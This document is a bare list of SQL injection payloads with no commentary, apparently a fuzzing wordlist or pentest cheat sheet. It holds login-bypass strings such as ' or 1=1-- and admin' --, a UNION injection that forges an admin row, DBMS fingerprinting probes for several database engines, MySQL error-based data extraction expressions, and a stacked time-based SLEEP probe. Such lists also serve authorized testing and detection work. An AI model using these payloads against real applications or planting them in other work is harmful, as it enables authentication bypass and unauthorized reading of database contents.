' or "='
' or 'x'='x
" or "x"="x
') or x=x--
') or ('x'='x
') or 1=1--
0 or 1=1
' or 0=0--
" or 0=0--
' or 0=0 #
" or 0=0 #
or 0=0 #
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1-- 
' + password -- 
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
SELECT * FROM tablee WHERE id = 1(.)."(),'. AND name = 'a'
SELECT * FROM tablee WHERE id = 9896-9895 AND name = 'a'
SELECT * FROM tablee WHERE id = 1'gRFyAL<'">CCsbxp AND name = 'a'
SELECT * FROM tablee WHERE id = 1) AND 2121=8896 AND (1248=1248 AND name = 'a'
SELECT * FROM tablee WHERE id = 1) AND 9734=9734 AND (1231=1231 AND name = 'a'
SELECT * FROM tablee WHERE id = 1 AND 9195=3952 AND name = 'a'
SELECT * FROM tablee WHERE id = 1 AND 9734=9734 AND name = 'a'
SELECT * FROM tablee WHERE id = 1 AND 5724=5209 AND name = 'a'
SELECT * FROM tablee WHERE id = 1 AND (SELECT CHR(115)&CHR(114)&CHR(100)&CHR(100) FROM MSysAccessObjects)=CHR(115)&CHR(114)&CHR(100)&CHR(100) AND name = 'a'
SELECT * FROM tablee WHERE id = 1 AND (SELECT CHR(117)||CHR(76)||CHR(86)||CHR(80) FROM SYSIBM.SYSDUMMY1)=CHR(117)||CHR(76)||CHR(86)||CHR(80) AND name = 'a'
SELECT * FROM tablee WHERE id = 1 AND (SELECT 'GXJo' FROM RDB$DATABASE)='GXJo' AND name = 'a'
SELECT * FROM tablee WHERE id = 1 AND (SELECT CHAR(98)||CHAR(65)||CHAR(85)||CHAR(103) FROM INFORMATION_SCHEMA.SYSTEM_USERS)=CHAR(98)||CHAR(65)||CHAR(85)||CHAR(103) AND name = 'a'
SELECT * FROM tablee WHERE id = 1 AND (SELECT CHR(111)||CHR(85)||CHR(76)||CHR(81) FROM SYSMASTER:SYSDUAL)=CHR(111)||CHR(85)||CHR(76)||CHR(81) AND name = 'a'
SELECT * FROM tablee WHERE id = 1 AND (SELECT 'JgcS' FROM VERSIONS)='JgcS' AND name = 'a'
SELECT * FROM tablee WHERE id = 1 AND (SELECT CHAR(101)+CHAR(79)+CHAR(106)+CHAR(100))=CHAR(101)+CHAR(79)+CHAR(106)+CHAR(100) AND name = 'a'
SELECT * FROM tablee WHERE id = 1 AND (SELECT CHAR(101)+CHAR(79)+CHAR(106)+CHAR(100))=CHAR(104)+CHAR(90)+CHAR(112)+CHAR(122) AND name = 'a'
SELECT * FROM tablee WHERE id = 1 AND (SELECT 0x596a6b66)=0x596a6b66 AND name = 'a'
SELECT * FROM tablee WHERE id = 1 AND (SELECT 0x596a6b66)=0x46757565 AND name = 'a'
SELECT * FROM tablee WHERE id = 1 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171706b71,(SELECT (ELT(9909=9909,1))),0x7170706271,0x78))s), 8446744073709551610, 8446744073709551610))) AND name = 'a'
SELECT * FROM tablee WHERE id = 1 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171706b71,(SELECT (ELT(6861=6861,1))),0x7170706271,0x78))s), 8446744073709551610, 8446744073709551610))) AND name = 'a'
SELECT * FROM tablee WHERE id = 1 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7171706b71,(SELECT (ELT(5412=5412,1))),0x7170706271,0x78))x)) AND name = 'a'
SELECT * FROM tablee WHERE id = 1 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7171706b71,(SELECT (ELT(7380=7380,1))),0x7170706271,0x78))x)) AND name = 'a'
SELECT * FROM tablee WHERE id = 1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7171706b71,(SELECT (ELT(7867=7867,1))),0x7170706271)) USING utf8))) AND name = 'a'
SELECT * FROM tablee WHERE id = 1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7171706b71,(SELECT (ELT(8983=8983,1))),0x7170706271)) USING utf8))) AND name = 'a'
SELECT * FROM tablee WHERE id = 1 AND (SELECT 9411 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(9411=9411,1))),0x7170706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND name = 'a'
SELECT * FROM tablee WHERE id = 1 OR (SELECT 1583 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(1583=1583,1))),0x7170706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND name = 'a'
SELECT * FROM tablee WHERE id = (SELECT CONCAT(0x7171706b71,(SELECT (ELT(4705=4705,1))),0x7170706271)) AND name = 'a'
SELECT * FROM tablee WHERE id = 1;SELECT SLEEP(5)# AND name = 'a'
